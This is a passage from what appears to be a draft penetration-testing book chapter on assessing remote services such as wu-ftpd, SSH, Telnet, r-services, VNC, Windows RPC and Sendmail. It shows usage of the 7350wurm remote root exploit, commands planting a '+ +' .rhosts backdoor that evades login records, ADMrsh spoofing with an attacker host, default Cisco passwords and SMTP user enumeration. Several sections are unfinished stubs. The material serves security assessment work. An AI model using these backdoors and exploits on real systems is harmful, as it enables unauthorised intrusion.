effectively exploit the following WU-FTPD servers found running on Linux
hosts out-of-the-box:
# 7350wurm
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version
0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
usage: ./7350wurm [-h] [-v] [-a] [-D] [-m]
[-t <num>] [-u <user>] [-p <pass>] [-d host]
[-L <retloc>] [-A <retaddr>]
-h this help
-v be verbose (default: off, twice for greater effect)
-a AUTO mode (target from banner)
-D DEBUG mode (waits for keypresses)
-m enable mass mode (use with care)
-t num choose target (0 for list, try -v or -v -v)
-u user username to login to FTP (default: "ftp")
-p pass password to use (default: "mozilla@")
-d dest IP address or fqhn to connect to (default: 127.0.0.1)
-L loc override target-supplied retloc (format: 0xdeadbeef)
-A addr override target-supplied retaddr (format: 0xcafebabe)
# 7350wurm -t0
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version
0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
num . description
----+-------------------------------------------------------
1 | Caldera eDesktop|eServer|OpenLinux 2.3 update [wu-ftpd-
2.6.1-13OL.i386.rpm]
2 | Debian potato [wu-ftpd_2.6.0-3.deb]
3 | Debian potato [wu-ftpd_2.6.0-5.1.deb]
4 | Debian potato [wu-ftpd_2.6.0-5.3.deb]
5 | Debian sid [wu-ftpd_2.6.1-5_i386.deb]
6 | Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]
7 | Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]
8 | Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-
8.6mdk.i586.rpm]
9 | Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]
10 | Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]
11 | RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]
12 | RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]
13 | RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]
14 | RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]
15 | RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]
16 | RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]
17 | RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]
18 | RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]
19 | RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
20 | RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]
21 | SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]
22 | SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]
23 | SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]
24 | SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]
25 | SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]
26 | SuSE 7.0 [wuftpd.rpm]
27 | SuSE 7.0 wu-2.4.2 [wuftpd.rpm]
28 | SuSE 7.1 [wuftpd.rpm]
29 | SuSE 7.1 wu-2.4.2 [wuftpd.rpm]
30 | SuSE 7.2 [wuftpd.rpm]
31 | SuSE 7.2 wu-2.4.2 [wuftpd.rpm]
32 | SuSE 7.3 [wuftpd.rpm]
33 | SuSE 7.3 wu-2.4.2 [wuftpd.rpm]
34 | Slackware 7.1
The tool can be easily run with the -a flag, which allows 7350wurm to grab
the banner of the target FTP server and select the correct target memory
addresses and padding values from its target list.
ProFTPD Vulnerabilities
1.2.4
1.2.5
SSH
The current version of SSH that a target host is running can be ascertained
by simply using telnet to connect to TCP port 22 of the host, as shown
below:
# telnet 192.168.0.80 22
Trying 192.168.0.80...
Connected to 192.168.0.80.
Escape character is '^]'.
SSH-2.0-OpenSSH_3.5p1
In this example the host is running OpenSSH 3.5 patch level 1 using the SSH
2.0 protocol. Hosts found running the old SSH 1.0 protocol are rare on the
Internet at the time of writing, as the SSH 2.0 protocol introduces many
useful security features.
Security conscious administrators will often modify the SSH banner to
present the following information:
# telnet 192.168.0.80 22
Trying 192.168.0.80...
Connected to 192.168.0.80.
Escape character is '^]'.
SSH-2.0-0.0.0
In this second example the SSH service supports the SSH 2.0 protocol, but
the actual type and version of the service itself is unknown (as it is set
to 0.0.0).
To properly interact with SSH and log in, we require an SSH client. SSH
clients can be found under most recent Unix-based platforms, and OpenSSH
(www.openssh.org) is a popular package containing both the SSH server and
client utilities for key pair generation and connection to SSH services.
For Windows users, PuTTY is a freely downloadable tool available with a
host of other SSH client utilities (including PSCP, PSFTP and Plink)
available from http://www.chiark.greenend.org.uk/~sgtatham/putty/.
Commercial SSH Vulnerabilities
OpenSSH Vulnerabilities
Ssh 1 CRC bug
channel_lookup
challenge response / PAM
Telnet
Common Telnet Banner List
Sun Solaris 8:
SunOS 5.8
Sun Solaris 2.6:
SunOS 5.6
Sun Solaris 2.4 and 2.5.1:
UNIX(r) System V Release 4.0 (hostname)
SunOS 4.1.x
SunOS UNIX (hostname)
FreeBSD:
FreeBSD/i386 (hostname) (ttyp1)
NetBSD:
NetBSD/i386 (hostname) (ttyp1)
OpenBSD:
OpenBSD/i386 (hostname) (ttyp1)
Red Hat Linux 8.0
Red Hat Linux release 8.0 (Psyche)
Debian Linux 3.0
Debian GNU/Linux 3.0 / hostname
SGI IRIX 6.x
IRIX (hostname)
IBM AIX 4.1.x:
AIX Version 4
(C) Copyrights by IBM and by others 1982, 1994.
IBM AIX 4.2.x and 4.3.x
AIX Version 4
(C) Copyrights by IBM and by others 1982, 1996.
Nokia IPSO:
IPSO (hostname) (ttyp0)
Cisco IOS:
User Access Verification
Password:
Livingstone ComOS:
ComOS - Livingston PortMaster
Sun Telnet Vulnerabilities
Loginex overflow affecting Solaris 6 - 8
BSD Telnet Vulnerabilities
Bsd overflow
Linux Telnet Vulnerabilities
Netkit telnetd remote
IRIX Telnet Vulnerabilities
Ld_so preload or whatever it was..
AIX Telnet Vulnerabilities
Bsd overflow
Appliance Server, Router & Switch Telnet Vulnerabilities
Ipso user enumeration:
pipex-gw>telnet 192.168.0.254
Trying 192.168.0.254 ... Open
IPSO (checkpointcharlie) (ttyp0)
login: root
Password:
Login incorrect
login: blaaah
Password:
Login incorrect
login: fw1adm
Password:
Password:
Login incorrect
login: fw1adm
Password:
Password:
Login incorrect
Login timed out after 300 seconds
[Connection to 192.168.0.254 closed by foreign host]
pipex-gw>
Cisco default passes, enable, system, cisco, router, admin, Cisco, !cisco
R Services
Unix r services are common to commercial Unix-based platforms in
particular, including Solaris, HP-UX and AIX. These services are listed in
the services file as:
exec 512/tcp
login 513/tcp
shell 514/tcp
Each of these services run using standard PAM username and password
authentication, which is in turn overridden by ~/.rhosts and
/etc/hosts.equiv file entries. Within Unix, the exec service is rexecd, the
login service is rlogind, and the shell service is rshd.
Accessing r services
From a Unix platform, rsh, rlogin and rexec clients are used to access the
respective r services running on a remote host. Figure 31 below shows the
usage for each client when run from the Unix command shell.
Figure 31: Running rsh, rlogin and rexec from the command shell
# rsh
usage: rsh [-nd] [-l login] host [command]
# rlogin
usage: rlogin [ -8EL] [-e char] [ -l username ] host
# rexec
rexec: Require at least a host name and command.
Usage: rexec [ -abcdhns ] -l username -p password host
command
-l username: Sets the login name for the remote host.
-p password: Sets the password for the remote host.
-n: Explicitly prompt for name and password.
-a: Do not set up an auxiliary channel for standard
error.
-b: Use BSD-rsh type signal handling.
-c: Do not close remote standard in when local input
closes
-d: Turn on debugging information.
-h: Print this usage message.
-s: Do not echo signals to the remote process.
Unix ~/.rhosts and /etc/hosts.equiv files
The .rhosts file exists in the user home directory under Unix, containing a
list of username and IP address or machine hostname pairs, such as the
following:
# pwd
/home/chris
# cat .rhosts
chris mail.trustmatta.com
+ 192.168.0.55
#
In this example, I can use any of the r services (rsh, rlogin or rexec) to
connect to this host from mail.trustmatta.com if I am logged into the host
as chris, or from 192.168.0.55 with any username on that host.
When a user connects to the host running rshd (the remote shell daemon
running on TCP port 514), the source IP address is cross-referenced against
the .rhosts file and verified by querying the identd service running at the
source. If these details are found to be valid, then direct access is given
to the host without even requiring a password.
A simple yet effective backdoor for most Unix-based systems running rshd is
to place an .rhosts file in the home directory of the bin user (/usr/bin/
under Solaris) containing the wildcard '+ +' for any user at any host.
Figure 32 below demonstrates this backdoor being planted and used to gain
access to the host:
Figure 32: Planting and accessing a simple .rhosts rshd backdoor
# echo + + > /usr/bin/.rhosts
# exit
hacker@host/$ rsh -l bin 192.168.0.20 csh -i
Warning: no access to tty; thus no job control in this
shell...
www% w
5:45pm up 33 day(s), 15 min(s), 1 user, load average:
0.00, 0.00, 0.01
User tty login@ idle JCPU PCPU what
root console 19Dec0219days -sh
www%
A useful feature with the rshd service is that terminals are not assigned
to processes run through rsh. This means that bin access through our rshd
backdoor does not appear in the utmp or wtmp logs, and is cloaked within
the system (not appearing within w or who listings). Unfortunately, the
network connection into TCP port 514 will appear if a user executes a
netstat -a command, and processes run by the bin user will also appear in
ps -ef listings.
It is very easy to get from bin to root under Unix-based systems, as
the bin user owns many binaries that run as system services (found
under directories including /usr/sbin/) with super-user root
privileges.
The /etc/hosts.equiv file is a system level file used to define trusted
hostnames or IP addresses that can freely access r services. SunOS 4.1.3_U1
shipped with a '+' wildcard in the /etc/hosts.equiv file, allowing for
attackers to gain direct bin level access to SunOS 4.1.3_U1 servers with
TCP port 514 open.
Testing the security of r services
User passwords can be brute forced across rlogind, as the service calls
/bin/login and the standard PAM mechanism. The rshd and rexecd services do
not pass username and password details to the login program in this way,
and merely rely on .rhosts and /etc/hosts.equiv entries for authentication.
It is recommended that for each user enumerated through finger, SMTP and
other information leak vulnerabilities, attempts are made to access the
host directly through open r services in the following fashion:
# rsh -l chris 192.168.0.20 csh -i
permission denied
# rsh -l test 192.168.0.20 csh -i
permission denied
# rsh -l root 192.168.0.20 csh -i
permission denied
# rsh -l bin 192.168.0.20 csh -i
Warning: no access to tty; thus no job control in this
shell...
www%
It will be possible to use rsh to log into a Solaris server as root if the
user's password has not been set. I have seen this only once in a live
environment, during an onsite audit I undertook in a hosting centre
containing Solaris web servers that had been built and configured using
automatic scripts.
Spoofing connections to the rsh service
If you are aware of trust between hosts or have seen .rhosts files on
compromised servers, tools can be used to spoof rsh connections by using IP
sequence prediction and falsified client responses to match entries in
.rhosts files server-side. A good tool used to perform such rsh spoofing is
ADMrsh, available from the ADM website at adm.freelsd.net/ADM/. The utility
requires the latest version of ADMspoof and its header files (found in ADM-
spoof-NEW.tgz at the time of writing), and its usage is shown below:
ADMrsh
**==**
It's very easy to use (like all the ADM products).
ADMrsh [ips] [ipd] [ipl] [luser] [ruser] [cmd]
Parameters List :
ips = ip source (ip of the trusted host)
ipd = ip destination (ip of the victim)
ipl = ip local (your ip to receive the informations)
luser = local user
ruser = remote user
cmd = command to execute
If ya don't understand, this is an example :
ADMrsh a.foo.us b.foo.us ppp.bad.org root root "echo/"+
+/">/.rhosts"
Credit's : Heike , ALL ADM CreW , !w00w00 , Darknet
ADMrsh 0.5 pub (c) ADM <-- hehe ;)
X Windows
Tcp 6000
Microsoft Remote Desktop Protocol
Remote Desktop Protocol (RDP) is used as a terminal service for thin client
access to the Windows desktop across a network. The service can be found
running on TCP port 3389, and the Microsoft terminal services (or Remote
Desktop within Windows XP) client is used to connect to the RDP service, as
shown in figure xx.
Figure xx: Connecting to RDP using the remote desktop client
VNC
AT&T's Virtual Network Computing (VNC) package is available from
www.uk.research.att.com/vnc/. VNC is a free and simple to deploy remote
desktop access system for Windows systems, and can be found running over
the following TCP ports:
Port 5800 for HTTP access to VNC using a Java client through a web
browser
Port 5900 for direct access to VNC using the native vncviewer.exe
From a security perspective VNC is relatively straightforward to
compromise. The main problem with VNC security is in the authentication
phase when a user connects to the service, below is a screenshot from
vncviewer.exe:
[pic]
VNC only requires one piece of data for authentication purposes, a session
password (which has a maximum length of 8 characters). On the target
server, the VNC password string is stored in the Windows registry under the
following keys:
/HKEY_CURRENT_USER/Software/ORL/WinVNC3
/HKEY_USERS/.DEFAULT/Software/ORL/WinVNC3
A fixed key is used to encrypt the VNC password using DES, and so if we can
gain read access to the registry across the network (often accessible on
poorly protected Windows hosts), it is possible to compromise the VNC
session password. The current fixed key can be retrieved from the VNC
source code, available from the AT&T site. At the time of writing the fixed
key found in VNC is 23 82 10 76 35 78 88 7.
VNCrack
VNCrack by FX of Phenoelit is a Unix-based VNC hacking utility available
from www.phenoelit.de/vncrack/. VNCrack is capable of performing the
following attacks against VNC servers:
Cracking of the Windows registry hex values to compromise the session
password
Direct brute force of the VNC session password
The VNC handshake can be sniffed and the session password compromised using
the Unix-based PHoss network sniffing utility, available from Phenoelit at
www.phenoelit.de/phoss/.
PCAnywhere
PCAnywhere listens on ports 22 (TCP and UDP), 5631 (TCP) "pcanywheredata",
and 5632 (TCP and UDP) "pcanywherestat), and 65301 (TCP).
Citrix
Citrix is a scalable thin client Windows service that is accessed directly
through TCP port 1494 and high dynamic ports (above 1024) server-side. The
protocol that Citrix uses is known as ICA (Independent Computing
Architecture), and upon locating a server with TCP port 1494 open, a Citrix
ICA client should be selected and used to connect to the service for
further investigation (available from
www.citrix.com/download/ica_clients.asp).
ControlIT
TCP port 799
Various vulnerabilities found in 1999 by ISS
Microsoft Windows Networking TCP Services
Microsoft Windows networking services involve use of the following TCP
services server-side:
135
139
445
UDP ports 137 and 138 are used primarily within Windows domains and
networks to facilitate name lookup and other functions, which are discussed
in the next chapter.
client / server communication 135
common internet file system 139 & 445
file sharing session 139
login sequence 139
UDP ports 137 and 138 are used for various NetBIOS naming lookup functions,
which are covered in the following Chapter.
The SMB (Server Message Block) protocol is used among other things for file
sharing in Windows NT / 2000. In Windows NT it ran on top of NBT (NetBIOS
over TCP/IP), which used the famous ports 137, 138 (UDP) and 139 (TCP). In
Windows 2000, Microsoft added the possibility to run SMB directly over
TCP/IP, without the extra layer of NBT. For this they use TCP port 445.
Microsoft DCE Locator Service running on port 135
Microsoft DCE Locator service aka. end-point mapper. It works like Sun RPC
portmapper, except that end-points can also be named pipes. Microsoft
relies upon DCE RPC to remotely manage services. Some services that use
port 135 of end-point mapping include DNS, WINS, Exchange and the Messenger
Service.
Enumerate system information through the DCE Locator Service
Through the DCE locator service we can primarily enumerate the following:
IP addresses used on other network interfaces
Details of services using dynamic high ports
EPDUMP
Epdump is a Windows command-line utility that can be used to query the DCE
locator service running on TCP port 135 of the target host in the following
manner:
D:/>epdump
binding is nil
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-0000-0000-0000-
000000000000@ncadg_ip_udp:192.168.0.1[1028]
annot 'Messenger Service'
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-0000-0000-0000-
000000000000@ncalrpc:[LRPC00000284.00000001]
annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-0000-0000-0000-
000000000000@ncacn_ip_tcp:62.30.68.4[1025]
annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-0000-0000-0000-
000000000000@ncacn_ip_tcp:192.168.170.1[1025]
annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-0000-0000-0000-
000000000000@ncacn_ip_tcp:192.168.189.1[1025]
annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-0000-0000-0000-
000000000000@ncacn_ip_tcp:192.168.0.1[1025]
annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
binding 00000000-0000-0000-0000-
000000000000@ncalrpc:[LRPC00000284.00000001]
annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
binding 00000000-0000-0000-0000-
000000000000@ncacn_ip_tcp:62.30.68.4[1025]
annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
binding 00000000-0000-0000-0000-
000000000000@ncacn_ip_tcp:192.168.170.1[1025]
annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
binding 00000000-0000-0000-0000-
000000000000@ncacn_ip_tcp:192.168.189.1[1025]
annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
binding 00000000-0000-0000-0000-
000000000000@ncacn_ip_tcp:192.168.0.1[1025]
annot ''
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-0000-0000-0000-
000000000000@ncalrpc:[ntsvcs]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-0000-0000-0000-
000000000000@ncacn_np:OSG-SERV[//PIPE//nt
svcs]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-0000-0000-0000-
000000000000@ncacn_np:OSG-SERV[//PIPE//sc
erpc]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-0000-0000-0000-
000000000000@ncalrpc:[DNSResolver]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-0000-0000-0000-
000000000000@ncadg_ip_udp:62.30.68.4[1028]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-0000-0000-0000-
000000000000@ncadg_ip_udp:192.168.170.1[1028]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-0000-0000-0000-
000000000000@ncadg_ip_udp:192.168.189.1[1028]
annot 'Messenger Service'
no more entries
D:/>
DCETEST
Dave Aitel wrote a simple yet effective Unix version of the epdump utility,
called dcetest. The dcetest tool is run in a similar fashion, with similar
results:
Brute force of user passwords through the DCE Locator Service
WMIcracker.exe uses TCP 135 to access the WMI and brute force passwords of
users in the administrators group
Remotely running arbitrary code or crashing the DCE Locator Service
Two particular vulnerabilities were disclosed in late 2002 regarding the
DCE locator service and flaws within the program that can lead to arbitrary
code being run or the service crashing. The bug is present in Windows NT
4.0 through to XP.
In particular, two articles are of interest:
http://www.mail-archive.com/bugtraq@securityfocus.com/msg09495.html
http://www.microsoft.com/technet/security/bulletin/MS03-001.asp
Microsoft NetBIOS Session Service running on port 139
NetBIOS Session (TCP), Windows File and Printer Sharing
Enumeration through the NetBIOS session service
Various tools can be used to enumerate a lot of sensitive information from
a target Windows workstation or server with TCP port 139 open. Information
can be gleaned either anonymously by setting up what is known as a null
session, or through knowledge of a valid username and password.
By default, Windows NT and 2000 hosts do not prohibit anonymous access to
information through NetBIOS, and so the following can be gleaned:
User list
Machine list
NetBIOS name list
Share list
Password policy information
Group and member list
Local Security Authority policy information
Trust information between domains and hosts
NIC IP and MAC addresses
Three tools in particular are very good at enumerating this information
Enum.exe
Dumpsec.exe,
dumpsec /computer=IPaddress /rpt=users /saveas=tsv /outfile=users.txt
Winfo.exe
Brute force of user passwords through the NetBIOS session service
SMBcrack.exe uses TCP 139 and crafts SMB packets
net use * //target/share passwd/user:domain/username
VPN & Remote Network Access Services
IPsec VPN tunnels and services do not even use standard IP, and are
therefore lie outside of the scope of this book. However, vendors such as
Checkpoint use IP for VPN communication, which is often more widely
supported.
IP-based VPN and remote network access services are as follows:
FW1-secureremote 256/tcp # also "rap"
FW1-mc-fwmodule 257/tcp # FW1 management console for
communication w/module
Fw1-mc-gui 258/tcp # also yak winsock personal chat
FW1-or-bgmp 264/udp # FW1 secureremote alternate
isakmp 500/tcp # ISAKMP
Checkpoint VPN
256 (TCP) Certificate/key distribution. VPN clients (SecuRemote) can
download keys on this port.
257 (TCP) logging
258 (TCP) Remote control over policy editing.
259?
Microsoft PPTP
Point to Point Tunneling Protocol - tcp/1723
ISAKMP
Internet Security Association and Key Management Protocol (ISAKMP)
This port is available on most systems that support IPsec. Many IPsec-
compatible VPN providers use this port, such as Nortel/Bay Networks
Extranet Access Client.
Tcp and udp 500
Ike-scan by nta monitor
Queries isakmp and works out vpn gateway type from responses
Network Proxy Services
Squid 3128
Socks 1080
Web 8080
It is possible to port scan through socks et al
E-Mail & News Services
Services used for e-mail and news delivery listed from the services file
are as follows:
smtp 25/tcp
pop2 109/tcp
pop3 110/tcp
nntp 119/tcp
imap2 143/tcp
Sendmail
Most Unix-based systems run Sendmail, including Linux, Solaris, OpenBSD and
others. Sendmail is particularly vulnerable to two specific types of
attack:
Information leak vulnerabilities
Process manipulation vulnerabilities
Sendmail Information Leak Vulnerabilities
If the Sendmail banner is obfuscated or modified, the true version of
Sendmail can usually be ascertained by issuing a HELP request (Sun Sendmail
8.9.3 in this case):
# telnet mx4.sun.com 25
Trying 192.18.42.14...
Connected to nwkea-mail-2.sun.com.
Escape character is '^]'.
220 nwkea-mail-2.sun.com ESMTP Sendmail ready at Tue, 7 Jan
2003 02:25:20 -0800 (PST)
HELO world
250 nwkea-mail-2.sun.com Hello no-dns-yet.demon.co.uk
[62.49.20.20] (may be forged), pleased to meet you
HELP
214-This is Sendmail version 8.9.3+Sun
214-Commands:
214- HELO MAIL RCPT DATA RSET
214- NOOP QUIT HELP VRFY EXPN
214-For more info use "HELP <topic>".
214-smtp
214-To report bugs in the implementation contact Sun
Microsystems
214-Technical Support.
214-For local information contact postmaster at this site.
214 End of HELP info
Valid user account details can be enumerated using one of three techniques:
EXPN username
VRFY username
RCPT TO:username
EXPN
The Sendmail EXPN command is historically used to expand details about a
given SMTP e-mail address. Detailed in figure xx below, we can ascertain
the following:
The test user account does not exist locally on the server
E-mail for root is infact sent to chris.mcnab@trustmatta.com
The sshd user account exists locally with the real name of sshd privsep
Figure xx: Using EXPN to enumerate user details
# telnet 10.0.10.11 25
Trying 10.0.10.11...
Connected to 10.0.10.11.
Escape character is '^]'.
220 mail2 ESMTP Sendmail 8.12.6/8.12.5 ready at Wed, 8 Jan
2003 03:19:58 -0700 (MST)
HELO world
250 mail2 Hello onyx [192.168.0.252] (may be forged), pleased
to meet you
EXPN test
550 5.1.1 test... User unknown
EXPN root
250 2.1.5 <chris.mcnab@trustmatta.com>
EXPN sshd
250 2.1.5 sshd privsep <sshd@mail2>
VRFY
The Sendmail VRFY command is historically used to verify that a given SMTP
e-mail address is valid. We can abuse this feature to enumerate valid local
user accounts, as detailed in figure xx below.
Figure xx: Using VRFY to enumerate user accounts
# telnet 10.0.10.11 25
Trying 10.0.10.11...
Connected to 10.0.10.11.
Escape character is '^]'.
220 mail2 ESMTP Sendmail 8.12.6/8.12.5 ready at Wed, 8 Jan
2003 03:19:58 -0700 (MST)
HELO world
250 mail2 Hello onyx [192.168.0.252] (may be forged), pleased
to meet you
VRFY test
550 5.1.1 test... User unknown
VRFY chris
250 2.1.5 Chris McNab <chris@mail2>
RCPT TO:
I have found this technique to be extremely effective at enumerating active
user accounts on even the most secure hosts. Many security conscious
network administrators ensure that EXPN and VRFY commands are not
accessible, but the RCPT TO: enumeration bug takes advantage of a
vulnerability deep within the Sendmail program, one that is not easily
removed without modification of source code.
Figure xx: Executing the RCPT TO: user enumeration attack
# telnet 10.0.10.11 25
Trying 10.0.10.11...
Connected to 10.0.10.11.
Escape character is '^]'.
220 mail2 ESMTP Sendmail 8.12.6/8.12.5 ready at Wed, 8 Jan
2003 03:19:58 -0700 (MST)
HELO world
250 mail2 Hello onyx [192.168.0.252] (may be forged), pleased
to meet you
MAIL FROM:test@test.org
250 2.1.0 test@test.org... Sender ok
RCPT TO:test
550 5.1.1 test... User unknown
RCPT TO:admin
550 5.1.1 admin... User unknown
RCPT TO:chris
250 2.1.5 chris... Recipient ok
Even Sendmail services protected by a firewall SMTP proxy (such as that
found on the Watchguard Firebox) are vulnerable to the RCPT TO: attack,
though suspicious commands such as EXPN, VRFY and HELP are filtered, as
shown below in figure xx.
Figure xx: Enumerating local users with Sendmail behind a firewall
# telnet 10.0.10.10 25
Trying 10.0.10.10...
Connected to 10.0.10.10.
Escape character is '^]'.
220
************************0*0*0*0*0*0*******2******2002********0
***
HELO world
250 mailserv.trustmatta.com Hello onyx [192.168.0.252],
pleased to meet you
EXPN test
500 5.5.1 Command unrecognized: "XXXX test"
VRFY test
500 5.5.1 Command unrecognized: "XXXX test"
HELP
500 5.5.1 Command unrecognized: "XXXX"
MAIL FROM:test@test.org
250 2.1.0 test@test.org... Sender ok
RCPT TO:test
550 5.1.1 test... User unknown
RCPT TO:chris
250 2.1.5 chris... Recipient ok
RCPT TO:nick
250 2.1.5 nick... Recipient ok
Sendmail Process Manipulation Vulnerabilities
The following remotely exploitable process manipulation vulnerabilities
exist in Sendmail:
Sendmail 8.8.3 and 8.8.4 MIME conversion buffer overflow (CVE-1999-0057)
http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=sendmail
MS Exchange ESMTP
Qpopper
MS Exchange POP3
Web Services
HTTP and HTTPS services can be assessed using the following:
Whisker
N-Stealth
Netcraft.com
HEAD / HTTP/1.0
OPTIONS / HTTP/1.0
Microsoft IIS
Global.asa
ISAPI filters
IDA, IDQ, IDC, HTR, HTW, PRINTER
Apache
Netscape enterprise
OpenSSL
Proxy Services
Squid - 3128
Socks - 1080
8080
HTTP CONNECT proxy on port 80
Database Services
Services that can be used by systems administrators or server operators to
directly access
1521 / 1524 (oracle), 1433, 3307 ?? (mysql), postgres.. etc.
sybase 2638/tcp # Sybase database
66 (TCP/UDP) Early assignment for Oracle SQL*NET
118 (TCP/UDP) sqlserv
150 (TCP/UDP) SQL-NET
156 (TCP/UDP) sqlsrv
1114 (TCP/UDP) mini-SQL
1433 (TCP/UDP) Microsoft SQL Server
1434 (TCP/UDP) Microsoft SQL Monitor
1498 (TCP/UDP) Sybase SQL AnyWhere
1521 (TCP) Oracle SQL*Net v2
1522 (TCP) Oracle
1525 (TCP) Oracle SQL*Net v1
1529 (TCP) Oracle SQL*Net
1978 (TCP/UDP) UniSQL
1979 (TCP) UniSQL Java
3306 (TCP/UDP) mySQL
3352 (TCP/UDP) SSQL
4333 (TCP) mSQL
Unix RPC Services
A number of interesting Unix services (including NIS+ and NFS) are RPC
services. RPC stands for Remote Procedure Call, and RPC services often run
on dynamically assigned high ports. To track and present clients with
accurate service details, an RPC portmapper service listens on TCP (and
sometimes UDP) port 111. The portmapper service can be queried using the
rpcinfo command found on most Unix-based platforms:
# rpcinfo -p 192.168.0.50
program vers proto port service
100000 4 tcp 111 rpcbind
100000 4 udp 111 rpcbind
100024 1 udp 32772 status
100024 1 tcp 32771 status
100021 4 udp 4045 nlockmgr
100021 2 tcp 4045 nlockmgr
100005 1 udp 32781 mountd
100005 1 tcp 32776 mountd
100003 2 udp 2049 nfs
100011 1 udp 32822 rquotad
100002 2 udp 32823 rusersd
100002 3 tcp 33180 rusersd
In this case, the Solaris server at hand is running the following RPC
services:
Status (also known as rpc.statd) on TCP port 32771 and UDP port 32772
Nlockmgr (also known as rpc.lockd) on TCP and UDP port 4045
NFS on UDP port 2049
Rquotad on UDP port 32822
Rusersd on TCP port 33180 and UDP port 32823
These services can then be accessed and queried directly, using client
software such as showmount and mount (for accessing NFS and its status,
lockd & rquotad components), and rusers as discussed earlier in this
chapter.
A list of popular RPC services along with their respective prognum values
is as follows (taken from the Unix /etc/rpc file):
portmapper 100000 portmap sunrpc
rstatd 100001 rstat rstat_svc rup perfmeter
rusersd 100002 rusers
nfs 100003 nfsprog
ypserv 100004 ypprog
mountd 100005 mount showmount
ypbind 100007
walld 100008 rwall shutdown
yppasswdd 100009 yppasswd
etherstatd 100010 etherstat
rquotad 100011 rquotaprog quota rquota
sprayd 100012 spray
3270_mapper 100013
rje_mapper 100014
selection_svc 100015 selnsvc
database_svc 100016
rexd 100017 rex
alis 100018
sched 100019
llockmgr 100020
nlockmgr 100021
x25.inr 100022
statmon 100023
status 100024
bootparam 100026
ypupdated 100028 ypupdate
keyserv 100029 keyserver
tfsd 100037
nsed 100038
nsemntd 100039
ypxfrd 100069
pcnfsd 150001
amd 300019 amq
sgi_fam 391002
Identifying RPC Services Without the Portmapper
In networks protected by firewalls and other mechanisms, it is not uncommon
for access to the RPC portmapper service running on port 111 to be
filtered. Determined attackers will often scan high port ranges (usually
between 32000 and 33000) looking for RPC services listening on high ports,
and then attempt to compromise these RPC services.
A list of common RPC service ports and their respective daemons under the
Sun Microsystems Solaris operating platform is as follows (taken from nmap-
services):
sometimes-rpc5 32771/tcp # Sometimes rusersd
sometimes-rpc6 32771/udp # Sometimes rusersd
sometimes-rpc7 32772/tcp # Sometimes status
sometimes-rpc8 32772/udp # Sometimes status
sometimes-rpc9 32773/tcp # Sometimes rquotad
sometimes-rpc10 32773/udp # Sometimes rquotad
sometimes-rpc11 32774/tcp # Sometimes rusersd
sometimes-rpc12 32774/udp # Sometimes rusersd
sometimes-rpc13 32775/tcp # Sometimes status
sometimes-rpc14 32775/udp # Sometimes status
sometimes-rpc15 32776/tcp # Sometimes sprayd
sometimes-rpc16 32776/udp # Sometimes sprayd
sometimes-rpc17 32777/tcp # Sometimes walld
sometimes-rpc18 32777/udp # Sometimes walld
sometimes-rpc19 32778/tcp # Sometimes rstatd
sometimes-rpc20 32778/udp # Sometimes rstatd
sometimes-rpc25 32786/tcp # Sometimes mountd
sometimes-rpc27 32787/tcp # Sometimes dmispd (DMI Service
Provider)
RPC Services of Interest
Rexd
On host command
Rstatd
Rusers
Rusers -l host
Nfs
Showmount -e host
Nis
Walld
Sprayd
Nlockmgr & status
Ypbind & ypupdated
Network Printing Services
Primarily when assessing internal networks, printers and other devices
which using IP can be found. In particular, HP printers are commonly found
with specific TCP ports open. A listing of common network printing services
includes:
9100 HP management
